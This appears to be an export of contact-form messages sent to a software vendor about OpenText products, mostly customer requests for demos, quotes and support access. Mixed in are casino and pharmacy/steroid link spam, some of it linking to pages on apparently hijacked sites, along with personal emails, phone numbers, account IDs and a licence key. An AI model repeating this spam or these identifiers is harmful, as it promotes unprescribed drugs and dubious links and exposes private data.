EOF: Fatal error: License not present: odbc_x000D_
 vid uppstart av tjänsten._x000D_
Ska det vara någon speciell licens för att utnyttja ODBC funktionen ?_x000D_
StreamServe License File 2007-05-07 14:33:46_x000D_
_x000D_
site                Konsum Värmland_x000D_
version             2_x000D_
customerid          SE1007938_x000D_
smtp                _x000D_
streaminput         _x000D_
faxout              _x000D_
mailout             _x000D_
streamout           _x000D_
pdfout              _x000D_
archive             _x000D_
zetafax             _x000D_
rightfax            _x000D_
xmlout              _x000D_
http                _x000D_
https               _x000D_
faxconnect          _x000D_
xmlin               _x000D_
ldap                _x000D_
mqseriesinput       _x000D_
mqseriesoutput      _x000D_
msmqinput           _x000D_
msmqoutput          _x000D_
ftp                 _x000D_
ediexchangein       _x000D_
ediexchangeout      _x000D_
hpgl                _x000D_
lickey              LRR6F3XM6GK_x000D_
</t>
  </si>
  <si>
    <t>Hi_x000D_
We can help your website to get on first page of Google and increase the number of leads and sales you are getting from your website._x000D_
_x000D_
Please email us back for full proposal._x000D_
_x000D_
Best Regards_x000D_
Linda</t>
  </si>
  <si>
    <t>Hi, I need access to MySupport for Streamserve/OT related documents. Kindly provide access._x000D_
Thanks</t>
  </si>
  <si>
    <t>casino games slots _x000D_
[url=http://playcasinoonline24.com/]play casino games online[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;slots online&lt;/a&gt; _x000D_
slot online</t>
  </si>
  <si>
    <t>kasino _x000D_
[url=http://playcasinoonline24.com/]online slots[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;online gambling casino&lt;/a&gt; _x000D_
online casino gambling</t>
  </si>
  <si>
    <t xml:space="preserve">Кто играет в ПАБГ? _x000D_
Я тут посмотрел видео на youtube о том, как игроки играют и был в шоке... _x000D_
Вы знаете о макросах для мышки A4tech x7? Как работают универсальные макросы на PLAYERUNKNOWNS BATTLEGROUNDS? _x000D_
Я посмотрел всевозможные видео по макросам на PUBG. Был в шоке от игры. _x000D_
Ссылка на видео, где люди убирают отдачу у оружия в ПАБГ: [url=http://www.youtube.com/watch?v=yRzpp-Fgm4Y]Макросы для pubg a4tech x7[/url]_x000D_
</t>
  </si>
  <si>
    <t>bonjour,_x000D_
_x000D_
je dois déposer un CASE pour un soucis sur la plateforme captiva 7.1, mais impossible d'y accéder.Pouvez vous m'indiquer la démarche à suivre. Pour information notre numéro client est le 10034408._x000D_
_x000D_
merci par avance_x000D_
_x000D_
laurent Frackowiak</t>
  </si>
  <si>
    <t>Dear All _x000D_
_x000D_
 _x000D_
We are a software and software company located in the Kingdom of Saudi Arabia and have another branch on Egypt and we have a number of customers and we also have a centura source version 2.1 and numbers of ERP applications working on many locations of customers _x000D_
_x000D_
 _x000D_
_x000D_
 _x000D_
_x000D_
Now we wish to open new market at more than country so we need to upgrade to last version of gupta application u own and know how to transfer and update our ERPs _x000D_
_x000D_
 _x000D_
_x000D_
so we hope and wish to have your support and help on this issue as you see or like we do not know your policy .._x000D_
_x000D_
 _x000D_
_x000D_
regards ;_x000D_
_x000D_
Hany Farouk Mowafi_x000D_
_x000D_
00966560260661</t>
  </si>
  <si>
    <t>Questions regarding Learning services and hotel locations for Reading, UK for course 3-0188</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
wir sind gerade dabei eine Anforderungsliste für ein ECM-System für unseren gewünschten Einsatzzweck zu erstellen._x000D_
Können wir Ihnen, nach Fertigstellung, diese Liste zur Bearbeitung zukommen lassen? Falls ja, an welche E-Mailadresse können wir diese Liste schicken?_x000D_
_x000D_
Ich bedanke mich vorab für die Beantwortung._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
i. A. Marc Prokop_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">As the global projects manager for SJK International Inc., I am contacting you to offer you our translation and localization services as a partner/vendor. _x000D_
_x000D_
Our head office is in central Tokyo, Japan, however, this does not narrow our language base to Japanese language pairs. _x000D_
We are highly specialized in many languages, with a majority of our projects centered around Japanese, Chinese (traditional/simplified), Korean, English, Russian, Portuguese, Thai and Vietnamese. _x000D_
I hope that to provide our outstanding translation services to your clients, especially those clients in need of Asian language output. _x000D_
_x000D_
I look forward to hearing from you and discussing more about this fun and wonderful partnership! _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Requested for a demo on 24th Jan. But did not receive any response for the inquiry. Please look into the same. Thank You. </t>
  </si>
  <si>
    <t>Hellow my name is Martincouri. Wery proper article! Thx :)</t>
  </si>
  <si>
    <t>Hi._x000D_
I am currently working with a client who is using opentext for contract management and I would love to get a demo from your end to help my client get the most out of your solution. _x000D_
_x000D_
Cheers_x000D_
PT</t>
  </si>
  <si>
    <t>Regarding better job oppertunity and as your linkedin video describes, i need an environment where i can display myself rather than being a doll and run how a boss likes.</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://mpcit.com.ar/mail/pear.php?jaaa=124-Cialis-Preise-TÃ¼rkei,Kamagra-Oral-Jelly-Wirkung,Levitra-Generikum]Cialis Preise TÃ¼rkei[/url]_x000D_
 If you're stressed out usually, the best way to lower your anxiety is to buy a dog. Having fun with animals is proven to lessen pressure and launch endorphins inside the human brain, allowing you to healthier and happier. Pet cats, puppies, wild birds, lizards, and a variety of other animals could be a wonderful way to de-stress your daily life._x000D_
  [url=http://www.uladdhh.org.ve/wp-content/plugins/back.php?a=320-Cheap-Testosterone-Boosters,Clomid-Singapore-Forum,Testosterone-Phenylpropionate-Recipe]Cheap Testosterone Boosters[/url]_x000D_
 If you are not vacationing in dorms, consider carpooling with many other students. You should certainly find other folks that are vacationing in the same place while you. You will likely be unable to carpool every day of every week with the exact same folks, but even two or three days can help build partnerships._x000D_
  [url=http://www.dev.lincolnsquare.co.uk/wp-content/zare.php?n=1331-Testosterone-Isocaproate-Msds,Nandrolone-New-Zealand,Testosterone-Phenylpropionate-Vs-Propionate.html]Testosterone Isocaproate Msds[/url]_x000D_
 Constructing a powerful reputation for on your own in mobile marketing requires job if you wish to be a good results. A portable internet marketer will likely be viewed as a businessperson, this means you must work on your general standing to acquire around the great part of customers._x000D_
  [url=http://www.earthapplestudio.com/wp-content/cancle.php?art=124-Boldenone-Rwr-Australia,China-Steroid-Powder,Methenolone-New-Zealand/]Boldenone Rwr Australia[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.ergodata.com.br/feed.php?p=59]Cialis Generika Bestellen[/url]_x000D_
 Don't use synthetic stimulants so that you can remain up and research lengthier. Caffeine intake and also other stimulant drugs can wreak destruction together with your sleep schedule along with your wellness. Given that rest time is as important as review time, you ought to be capable to sleep when you can. Choosing the best stability involving studying and getting to sleep is actually a greater strategy for acing assessments._x000D_
  [url=http://www.sbasatsang.org/Content/get.php?hj=85-levitra-for-sale-online-buy-levitra-ireland-generic-levitra/]levitra for sale online[/url]_x000D_
 Prior to starting forex trading in earnest, be sure to register by using a internet based brokerage that has the capability to provide a free of charge exercise forex trading solution. This allows you to make investments using dummy cash so that you will may get the sense of creating alterations and attempting to time the industry without placing your real money in jeopardy._x000D_
  [url=http://www.coventryhistoricalsociety.org/fonts/down.php?f=27-Levitra-20mg-Vs-Cialis,Australian-Levitra,Bayer-Levitra-Australia.html]Levitra 20mg Vs Cialis[/url]_x000D_
 Should you be looking for a way to pay for college or university, perform some research on scholarships or grants. A lot of businesses and affinity organizations set up scholarship grants that college candidates can put on for, depending on a definite pair of conditions. You could be surprised at what you are able be eligible for a. Usually do not exclude an opportunity before you check into it._x000D_
  [url=http://www.butikpasta.org/images/power.php?pa=156]Ansomone For Sale[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
I’m curious to know if you would be interested in acquiring our recently updated contact list of IT Pros, Business Managers, EMC Customers and Partners._x000D_
If you are interested, please let me know your target audience, I will share you further information along with count and cost details._x000D_
Thank you and looking for your response._x000D_
Regards,_x000D_
Cynthia Lopez_x000D_
Data Marketing Manager_x000D_
IT Contact Zone_x000D_
 _x000D_
Services: Email Campaign Services| Data Appending Services |Data Verification Services_x000D_
</t>
  </si>
  <si>
    <t>Not able to connect. Please give me access to download AppWorks  gateway</t>
  </si>
  <si>
    <t>We are currently looking into replacing our existing fax solution, Goldfax with a hybrid cloud solution.   We currently use a brooktrout/on-prem solution that runs through our voice gateway and the quality of our faxes can be suspect at times.  I am curious if Rightfax can provide an improvement over our current solution.</t>
  </si>
  <si>
    <t xml:space="preserve">Need to set up an account for Nordstrom to issue UPC/EAN for UPC catalog. </t>
  </si>
  <si>
    <t>Need trial for open text nfs</t>
  </si>
  <si>
    <t>Need to allow access for a fellow co-worker._x000D_
Name:  Chris Hunt_x000D_
email:  chunt1@humana.com</t>
  </si>
  <si>
    <t>Hello,_x000D_
I attended the Ellucian Live session in San Diego. Curtis Clark, Product Manager at Ellucian, advised as users of Banner / Banner Document Manager, OpenText will be able to provide user training material. Since we are in the process of upgrading within 10 days, would appreciate your support in the matter. _x000D_
Thanks. _x000D_
Regards,_x000D_
Sapna_x000D_
Sapna Maheshwari-Bajaj, MCA, PMP, CSM_x000D_
Sr. Business Systems Analyst_x000D_
smaheshw@emich.edu</t>
  </si>
  <si>
    <t>I'd like to book a demo.</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.shoemaking.co.uk/css/list.php?a=165-Kamagra-100mg-Kaufen,Cialis-Made-In-Germany,Levitra-Kaufen-Ohne-Rezept-Forum]Kamagra 100mg Kaufen[/url]_x000D_
 So that you can use a far better recollection, you will want to have various likes and dislikes, and try new stuff. This can keep your brain razor-sharp and wide open for brand new recollections. Furthermore, these new neurons will hook up to pre-existing neurons, which can then provide you with a new approach concerning how to check out some thing._x000D_
  [url=http://www.americangarage.fr/test/may.php?den=Testosterone-Pellets-Mesterolone-Cycle-Primobolan-Powder-Conversion-1358/]Testosterone Pellets[/url]_x000D_
 If you would like have total security for the zits-vulnerable skin area, don't forget about to reapply sunscreen every a couple of hours. In the event you sweat a lot or go going swimming you'll need to reapply immediately. Take care of sunscreens which are water-resistant as they frequently have oils which is NOT great for your epidermis sort._x000D_
  [url=http://www.gebafrique.com/logs/mon.php?id=44]Ansomone Reviews[/url]_x000D_
 Before you decide to strike the bedding through the night, you should consider all the wonderful stuff that is developing in your own life today. Do the same thing the following morning. You could possibly feel that you do not have any good things taking place in your daily life, but each person will find some thing good in his / her life, even when it is one thing tiny. The process will help reduce your anxiousness._x000D_
  [url=http://www.bearcreekponybaseball.org/images/always.php?menu=Stanozolol-Generic-Clomid-Singapore-Forum-Testosterone-Phenylpropionate-Recipe-1058/]Stanozolol Generic[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to access a document sent to me via fax to mail and my emailed blocked the attachment, I know it is not a harmful attachment so I clicked the reprocess this document button which then opened up the login page and prompted me to sign in but it is telling my login information is incorrect. I need to access this document ASAP please help I have never had this issue before! </t>
  </si>
  <si>
    <t>Please send me a price quote to upgrade our existing rightfax services</t>
  </si>
  <si>
    <t>Hello, I am doing a high level review of online survey and CX providers. One of our primary drivers is an option to add encryption at rest / data isolation. Is this a service that you provide? Thank you, Melissa</t>
  </si>
  <si>
    <t>casino games real money _x000D_
[url=http://playcasinoonline24.com/]online gambling casino[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;slots online&lt;/a&gt; _x000D_
casino slots</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to meet and review OpenText and product suites for document/forms production, retrieval and printing. We currently have Skywire and our migrating to OnBase for archive but need to address our forms and document production, retrieval and printing. My goal would be to schedule an on site discussion of your products and how they might solve our desire to completely move away from Skywire. </t>
  </si>
  <si>
    <t xml:space="preserve">BIRT training inquiry. </t>
  </si>
  <si>
    <t>I received a receipt for $144.00 that also says my card ending in 3000 will be charged $144 a year.  The order number referenced is Order ID: ch_1CKXG6CoGUa9VTUcxb0kPXQp_x000D_
What is this?? Terry</t>
  </si>
  <si>
    <t>Customer is looking for a quote.</t>
  </si>
  <si>
    <t>casino games _x000D_
[url=http://playcasinoonline24.com/]online casino gambling[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;online casino slots&lt;/a&gt; _x000D_
slot game</t>
  </si>
  <si>
    <t>Layoff &amp; Need to Regain Access to GXS Catalogue.  Don't know what user the password reset is being sent to, and the only individual with this information was laid off._x000D_
_x000D_
Network ID: CS1264_x000D_
User ID: CS1264A_x000D_
_x000D_
Thanks,_x000D_
Rich</t>
  </si>
  <si>
    <t xml:space="preserve">Afternoon,_x000D_
_x000D_
It is to my knowledge that you have provided GC Docs training to certain government departments. Could you provide me with the necessary information needed if I were to request the training for our department, Parks Canada._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Tracy Casperson_x000D_
</t>
  </si>
  <si>
    <t>Dear Sir/Madam,_x000D_
_x000D_
I was working for Algotech/Geomant who had several Qfiniti utilizing customers, and later for Transcom, who used Qfiniti in house for voice and screen recording._x000D_
_x000D_
I had been working with Qfiniti product extensively performing installation, upgrade, maintenance, customizations until last year. I have a broad Telecom knowledge regarding application integrations with PBXs. I could offer my professional services to your in the EMEA region as a contractor. I would like to utilize my Qfiniti related knowledge for customers as I am looking new opportunities._x000D_
_x000D_
It would be very kind of you, if you could let me know who can I contact if you think you are not the proper person regarding my question._x000D_
_x000D_
Thank you very much,_x000D_
Tamas Mauthner</t>
  </si>
  <si>
    <t>Am a consultant working with State of NJ Dept of Health.  Their IT dept is implementing TomEE. NJ DOH uses Teamsite.  Am attempting to determine if TomEE can access content from Teamsite.  Cannot seem to find that info on website, sorry</t>
  </si>
  <si>
    <t>Новый источник финансовой информации: Все новости финансового мира. Форекс. Биткоин. Майнинг _x000D_
*** _x000D_
Добавлено 13.04.2018 08:59 _x000D_
Ссылка на сайт [url=financist.info]financist.info[/url]</t>
  </si>
  <si>
    <t>Please cancel account</t>
  </si>
  <si>
    <t>Looking for a fax server to replace our FaxPress Premier Analog fax server.</t>
  </si>
  <si>
    <t>We have been using the Alchemy Gold product and it is no longer working.  We need to make a change and are wondering about options, migration and cost.  Please contact me._x000D_
Thank you!</t>
  </si>
  <si>
    <t>Please stop trying to fax on our work phone number. I have gotten 10 calls in just the past HOUR!!!!</t>
  </si>
  <si>
    <t>Beaver Street Fisheries has implemented a new document tracking system for all our suppliers and in reviewing your account found that we are missing both a W9 and a Liability Policy showing BSF as the Consignee. Can you please forward these to me as soon as possible?</t>
  </si>
  <si>
    <t xml:space="preserve">Product acquisition, please contact me by email asap, we need to understand how to implement your solution to perform authorization workflows </t>
  </si>
  <si>
    <t>Когда вы будете подыскивать новый уплотнитель, выбирайте изделие евро производства, так как китайские либо турецкие аналоги не отличаются долговечностью &lt;a href="http://www.ristroy.ru/info/pokraska-vanny-svoimi-rukami.html"&gt;Покраска ванны своими руками&lt;/a&gt;.</t>
  </si>
  <si>
    <t xml:space="preserve">I’m writing to let you know that the Conference Board’s annual Public Sector Transformation conference is back in Ottawa on November 20 &amp; 21, 2018.  As a leader in digital transformation, we’d like to invite you to join us as a sponsor, with an opportunity to present your solutions to a pre-qualified audience._x000D_
_x000D_
This conference will look at the latest initiatives in the public sector, examining current approaches to change and highlighting practitioners doing the best work. The program will center on the theme of Digital Government with the twin focus of people and technology. Public Sector Transformation 2018 will discuss how digital government can be harnessed as a tool for transforming the workplace and service delivery.  Leaders from all levels of government will come together to learn, share and challenge each other to create Canada’s future digital government._x000D_
_x000D_
If you want to reach over 150 senior level decision makers there is no better way than to sponsor this event.  You’ll connect directly with Assistant Deputy Ministers, Directors General, Directors, and Senior Managers of:_x000D_
•             human resources_x000D_
•             risk management_x000D_
•             finance_x000D_
•             IT_x000D_
•             crisis management_x000D_
•             communications_x000D_
•             project management_x000D_
•             service delivery_x000D_
•             public policy_x000D_
•             social media_x000D_
_x000D_
I’m including the sponsorship document here for your review.  Would you have a few minutes next week to connect by phone and speak in more detail?_x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Tracie_x000D_
_x000D_
Tracie Jones_x000D_
Manager, Program Development and Sponsorship_x000D_
The Conference Board of Canada_x000D_
Mobile: 613-862-1566_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Can you please enable "My Support" for my account id ? The existing support personal (Kathleen Bonilla) has left the organization and I am trying to setup the support access. </t>
  </si>
  <si>
    <t>Tried requesting a trial of NFS Client &amp; NFS Solo, but link does not appear to do anything after entering the information.</t>
  </si>
  <si>
    <t>I am looking for a tool that would support document management, workflow processes and perhaps even contract lifecycle management. I think you have these options, but I would like to understand to what extent these function within a department of approx. 50 people across different locations, for a business that is highly regulated and strongly secured.  We already have Documentum rolled out within the corporation.  _x000D_
I have not found a demo on your site yet which provides the overview of these yet it seems that there is a way to integrate all our requests together._x000D_
I would appreciate receiving some demo on your solutions._x000D_
Thank you._x000D_
Yours sincerely,_x000D_
Gillian Hankey</t>
  </si>
  <si>
    <t>kasino _x000D_
[url=http://playcasinoonline24.com/]online casino slots[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;casino games&lt;/a&gt; _x000D_
casino games real money</t>
  </si>
  <si>
    <t xml:space="preserve">Document management - checking in on this product_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I represent the Best and Brightest Companies to Work For Program and competition in San Francisco, and we’ve identified you as a potential nominee to go through our selection process this year. If you are interested in applying, I am more than happy to send you additional participation information. _x000D_
_x000D_
I would love to work with you this year. Thank you!_x000D_
</t>
  </si>
  <si>
    <t>recently bought open text for new lap top - already got a version on another lap top_x000D_
how do I download license key.? and sotfware</t>
  </si>
  <si>
    <t>online slots _x000D_
[url=http://playcasinoonline24.com/]casino games slots[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;cassino&lt;/a&gt; _x000D_
slots online</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.etspinoff.it/books/new.php?pike=Boldenone-Acetate-Benefits-China-Steroid-Powder-Methenolone-New-Zealand-66/]Boldenone Acetate Benefits[/url]_x000D_
 Rubbing and pressure can worsen acne breakouts and make them more prone to rupture that may result in scars. Prevent sporting small clothing such as turtlenecks, keeping a telephone to your cheek for days on end and always adapt bands on helmets so they are certainly not too restrictive. Try and wear garments that breathes as well, for example natural cotton._x000D_
  [url=http://www.dmgroupkararwala.com/blog/list.php?pdd=326]Cheap Testosterone Supplements[/url]_x000D_
 Personal development are available in different ways. Among the most effective to start out your journey towards the improvement of your self is going to be by the due date - for everything. If you are promptly, all is effectively using the community. Should you be delayed, the stress can ruin your prospect._x000D_
  [url=http://www.jzto.ru/layouts/editor.php?e=1209-Testosterone-Boosters-Gnc,Methenolone-Oral,Tadalafil-Supplier]Testosterone Boosters Gnc[/url]_x000D_
 Will not put any regulations in in case you are playing a strategy game or sporting activities video game along with your friend. This could be construed as being unfaithful, as you will need to try and create the most levels actively playing discipline probable if you are challenging a buddy to your online game. Continue to keep issues reasonable for a excellent online game play encounter._x000D_
  [url=http://www.parakco.com/footer/button.php?put=Methandienone-Buy-Mesterolone-Cycle-Primobolan-Powder-Conversion-619/]Methandienone Buy[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.phanbonviety.com/libraries/simplepie/very.php?bng=145]Igf 1 Prezzo[/url]_x000D_
 Attempt to avoid giving young children "I told you so responses." Even though in many particular circumstances this could be essential there is normally a much better way. It is essential for kids to learn why they must not do just about anything since this enables them to expand being a man or woman as well as figure out how to make their own personal good choices._x000D_
  [url=http://www.box-s.net/admin/power.php?TypeID=53-Cialis-Billigt-Flashback,KÃ¶pa-Cialis-PÃ¥-NÃ¤tet,Viagra-Sverige-Snabb-Leverans]Cialis Billigt Flashback[/url]_x000D_
 Pressure might be a induce for anxiousness and anxiety attacks. Too much anxiety can play a role in hyperventilation and anxiety that can result in a full-blown panic attack. If you suffer from anxiety and stress, find strategies to loosen up, breathe seriously and take a time-out. Should your stress is extreme, it is wise to consult your doctor._x000D_
  [url=http://www.tritindesign.com/wp-content/include.php?cn=321-Lovegra-100mg,Cialis-Billiger-Geworden,Cialis-KÃ¶pa-Online.html]Lovegra 100mg[/url]_x000D_
 A great suggestion for your house organization is to not only carry competitions on the site but to also commonly publicize the competitions. This may generate a wide variety of clients that could not have ever regarded as likely to your site. Having prize draws almost always will provide you with a good label._x000D_
  [url=http://jp.imelfin.com/image/ning.php?use=390-Clomid-Online-South-Africa-Boldenone-Cypionate-Vs-Eq-Stanozolol-Steroid-Australia/]Clomid Online South Africa[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.xuma.com.tr/cook/footer.php?yu=1326-Testosterone-Isocaproate,Methenolone-Oral,Tadalafil-Supplier]Testosterone Isocaproate[/url]_x000D_
 One of many keys to aging sensibly is always to still find that means in your own life. For many people, daily life involves loved ones and operate, but as you may mature certain things may possibly alter, making a gap in your life. Kids will keep the nest, and you will definitely retire. This could all of a sudden leave you with plenty of leisure time on the hands and wrists, however it doesn't indicate that you need to cease continuing to move forward. Actually, it's the right time to find fascinating something totally new to occupy your lifestyle._x000D_
  [url=http://www.ibagrp.com/backup/font.php?color=326-Cheap-Testosterone-Supplements-Oxandrolone-For-Sale-Oxymetholone-Dosage.html]Cheap Testosterone Supplements[/url]_x000D_
 Make certain your email strategy matches your brand. Use the exact same logos, typefaces, colors as well as a similar online messaging design from what your potential customers can find on your web site. This can help the receivers of your own e mail feel at ease with all the content and ensures they are more prone to open it._x000D_
  [url=http://www.confiesate.com/libraries/flash.php?lib=Methandienone-Suppliers-Clomiphene-For-Men-Nandrolone-Wholesale-645/]Methandienone Suppliers[/url]_x000D_
 And also hardwearing . espresso beans fresh, place them in the fridge. Even though many people refrigerate their caffeine, the process allows the beans to absorb odors from foods in your fridge. An improved solution is to hold the beans. One easy technique would be to break down the legumes into a number of small packages to help you merely take away a package as required._x000D_
  [url=http://www.bfcfincon.co.za/img/move.php?m=9-buy-jintropin-uk,hygetropin-brown-tops-2018,ansomone-hgh-review]buy jintropin uk[/url]_x000D_
</t>
  </si>
  <si>
    <t>Estimados, a pesar que aun no tenemos el nuevo contrato de soporte, el cual esta en camino de la OC correspondiente, me pongo en contacto porque estamos teniendo inconvenientes a nivel de la licencia perpetua contratada que cumplio los intentos maximos por algún inconveniente que pierde la activación con el servidor de ustedes.  Que se puede hacer?</t>
  </si>
  <si>
    <t>My job uses first class as our main email service. I use Android devices, when will the Android version  of first class get same features as the ios versions? It has been many years already with no updates. Android version seems well behind the ios version.    Thank you</t>
  </si>
  <si>
    <t>I have a simple little question that can be answered in a "Communities Forum"... but you people make it like a Friggin Act Of Congress to Register and show proof of Maintenance Contract and all this red tape crap.... just to answer a simple question._x000D_
If this were my company... I wouldn't even use your Open Text Product!!!!_x000D_
Create a User Community that doesn't require an Act of GOD to find a simple answer._x000D_
Geezzzzzz!!!!!!</t>
  </si>
  <si>
    <t>need to know companies providing support in kenya for case 360</t>
  </si>
  <si>
    <t xml:space="preserve">Could You provide quote for Sellafield_x000D_
250 EROOM (CORE) ST ER-CLIENT_x000D_
Legacy ECD Basic Support | Instance ID 58389813_x000D_
1 BASIC SOFTWARE SUPPORT M-BASSWD-002_x000D_
Contract Number: 932371D-2_x000D_
Renewal Number: RC190137_x000D_
Maintenance Term Start Date: 01/04/2018_x000D_
Maintenance Term Expiration Date: 31/03/2019_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">if i take for 10 license will it be permanent license or annual renewal base. </t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
Рекомендуем прочитать эту тему - [url=http://znatprovse.ru/polezno-znat/semechki-podsolnuha-sostav-polza-svojstva-i.html]жарить семечки[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.bidiclothing.com/wp-content/num.php?a=895-Oxymetholone-Anadrol-Steroid,Sildenafil-Citrate-Powder-Suppliers,Trenbolone-Acetate-Benefits/]Oxymetholone Anadrol Steroid[/url]_x000D_
 Which is more essential, developing a community or good advertising and marketing? The truth is that the network is what makes serious cash, nevertheless the marketing and advertising is the thing that builds the community. This means you have to dedicate a chance to each - foster your network to make sure they're nonetheless allowing you to funds, but force your advertising to develop your system should you have to switch reduced earners or quitters._x000D_
  [url=http://www.1001tour.kz/images/simple.php?s=535-Drostanolone-Propionate-100mg-Mesterolone-Cycle-Primobolan-Powder-Conversion]Drostanolone Propionate 100mg[/url]_x000D_
 To obtain the right auto insurance insurance policy these days, you need to know where and how to look. There are excellent and extremely significantly lower rates on the market to take pleasure from, so you want to make certain that you are getting the speed which you deserve. Without the need of these pointers, you might be paying 100s a lot more than you should.Concered About Your Credit? Here's Some Tips_x000D_
  [url=http://www.khokkwai.go.th/images/install.php?n=666-Methasterone-Nz-Anabolic-Steroid-Names-Nandrolone-Prescription-Australia]Methasterone Nz[/url]_x000D_
 Now you should have a concept of just how much money you save through the intelligent usage of coupons. Many people already have significantly reduced their paying by mastering the usage of vouchers. Just start off utilizing the ideas with this report and you will probably be amazed at how much you can conserve.Try Out These Simple Mlm Tips Today!_x000D_
  [url=http://www.personnellink.com.sg/product/class.php?sz=Drostanolone-Dosage-Methandienone-Usa-Tadalafil-Powder-For-Sale-508.html]Drostanolone Dosage[/url]_x000D_
</t>
  </si>
  <si>
    <t>REGISTRATION FOR ATTENDANCE OF THE OPEN TEXT EXPO 2018</t>
  </si>
  <si>
    <t>slot game _x000D_
[url=http://playcasinoonline24.com/]online casino gambling[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;casino games&lt;/a&gt; _x000D_
online gambling casino</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.barui.co.za/wp-includes/fonts/tag.php?q=108-Hgh-Fragment-176-191-Legal]Hygetropin-Kaufen[/url]_x000D_
 Use comfortable clothes that isn't limited installing. Clothing that is certainly limited can place stress on your skin and result in rubbing. Prevent bra straps that happen to be also tight. This can result in acne breakouts, like blackheads and pimples, onto the skin. Put on outfits which are shed appropriate which will help you stay amazing._x000D_
  [url=http://www.sehr-ikebap.com.tr/wp-content/book.php?vbt=27.html]Jintropin Hgh For Sale Uk[/url]_x000D_
 For ideal skin area health, be sure to take in meals that contains nutritional vitamins A, C, and E. Skin care isn't pretty much the things you wear your face. The foods that you consume engage in an important role in the quality of your epidermis, at the same time. The same vitamin supplements are available in skin area creams, but they are far more good at safeguarding your epidermis when eaten in meals._x000D_
  [url=http://www.dogankaya.com/guvCode/example.asp?p=19]Cialis Apotheke Berlin[/url]_x000D_
 Prior to looking for a home, it is prudent to get an original consultation with a mortgage company. By doing this, it is possible to get a pre-qualification or pre-acceptance, that gives consumers elevated reliability within the eyeballs of retailers. This process also helps customers fully grasp precisely how much residence they could pay for helping thin their home research guidelines._x000D_
  [url=http://www.centralflorida-webdesign.com/content/get.php?h=7-Generieke-Viagra-Forum-Lovegra-Review-Vrouwen-Viagra/]Generieke Viagra Forum[/url]_x000D_
</t>
  </si>
  <si>
    <t>Requesting contact from account manager</t>
  </si>
  <si>
    <t>online gambling casino _x000D_
[url=http://playcasinoonline24.com/]slot game[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;kasino&lt;/a&gt; _x000D_
cassino</t>
  </si>
  <si>
    <t>I am not able to access the knowledge center &amp; support areas for my account. Kindly help in resolving the same.</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
für unser Unternehmen sind wir auf der Suche nach einem Dokukmentenmanagementsystem für die Erstellung, Verteilung und Archivierung von "gelenkten" Dokumenten im geregelten Bereich. Können sie mir bitte zu ihrem DMS System Documentum weitere Informationen zukommen lassen? Wird ihr System auch von Kunden im Pharma-Bereich verwendet? Ist es FDA 21 CFR Part 11 compliant? Können sie mir hier bitte auch einen Auszug ihrer Kunden-Referenzen zu senden?_x000D_
Vielen Dank und freundliche Grüße_x000D_
Stefan Kemper </t>
  </si>
  <si>
    <t>Application for Director- Professional Services India</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.tippvision.com/wp-content/biller.php?g=1399-Testosterone-Propionate-Cycle-Testosterone-Powder-India-Trenbolone-Cost-Uk.html]Testosterone Propionate Cycle[/url]_x000D_
 It is very important have two main charge card balances wide open and mirrored on your credit track record. These balances should likewise supply possible credit history nevertheless on the charge cards. Experiencing two key bank cards shows interactions with Credit history-greeting card companies, and so, with out these partnerships or with over two, you will be viewed as a credit rating chance._x000D_
  [url=http://www.go-cvs.com/images/near.php?loop=1181-Testosterone-Acetate-Reviews-Oxandrolone-For-Sale-Oxymetholone-Dosage.html]Testosterone Acetate Reviews[/url]_x000D_
 If you need first a few months rent, final weeks rent payments as well as a deposit, so that you can hire a home, check with the property owner about potentially make payment on very last a few months rent over time. By having a couple hundred or so dollars to each month's transaction, you will get that new location, without needing to have each of the money in the beginning._x000D_
  [url=http://www.iconepress.com.br/img/error.php?job=1081]Stanozolol Price In Canada[/url]_x000D_
 Don't just send your curriculum vitae. This is certainly some thing a great deal of task hunters make your oversight of performing. You must do a lot more than deliver a continue if you want the job. Except if the listing specifically states never to, give them a call. Get a small specifics of the positioning to help you greater modify your continue and cover letter to their demands._x000D_
  [url=http://www.sorobit.net/wp-content/uploads/fustanella.php?page_id=679-Methenolone-Acetate,Clomiphene-For-Men,Nandrolone-Wholesale]Methenolone Acetate[/url]_x000D_
</t>
  </si>
  <si>
    <t>healthier intimacy_x000D_
_x000D_
becoming a doctor, I get much of consumers who are concered about closeness also intercourse. dating reference books are a gorgeous free yourself from caused by truth of the matter, And can reduce your stress by means of per day aggravations. and furthermore, also you can be shown a few ideas to raise your couples. danger enters the picture if you begin to trust the fairy tale, put side by side your family real wife to a fictional appeal, and be not satisfied and experience unfulfilled. essentially elegant reasons for having love personalities is because they do all the work, but in an actual liaison possessing a real fella, a lot of have to get making use of and also let him know what you would like._x000D_
_x000D_
